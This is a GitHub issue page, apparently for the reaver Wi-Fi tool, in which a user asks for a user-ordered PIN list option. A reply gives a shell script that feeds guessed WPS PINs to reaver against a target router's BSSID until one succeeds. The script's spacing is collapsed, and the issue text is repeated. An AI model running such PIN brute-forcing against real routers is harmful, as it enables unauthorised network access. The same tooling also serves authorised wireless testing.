You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Hello
I suggest a command line option to add a file with the list of the pins in a order defined by user. So they can add guesses they think are most probable to be chosen in the first positions.
Thank you!
The text was updated successfully, but these errors were encountered:
#!/bin/sh# set the target BSSID
bssid='00:00:00:00:00:00'# set monitor interface
wmon='wlan0mon'# set your pin list, 4/7/8 digits or string
pins='1234123456712345678'# set the path of .wpc file
wpc=$(printf "/usr/local/var/lib/reaver/%s.wpc""$bssid"| sed 's/://g')forpinin$pins;doprintf"\n[+] Trying your pin \"%s\"\n""$pin"if reaver -i $wmon -b $bssid -vN -p $pin -g 1 -s "$wpc";thenecho"[!] Bingo!!!"breakfidone
Hello
I suggest a command line option to add a file with the list of the pins in a order defined by user. So they can add guesses they think are most probable to be chosen in the first positions.
Thank you!
The text was updated successfully, but these errors were encountered: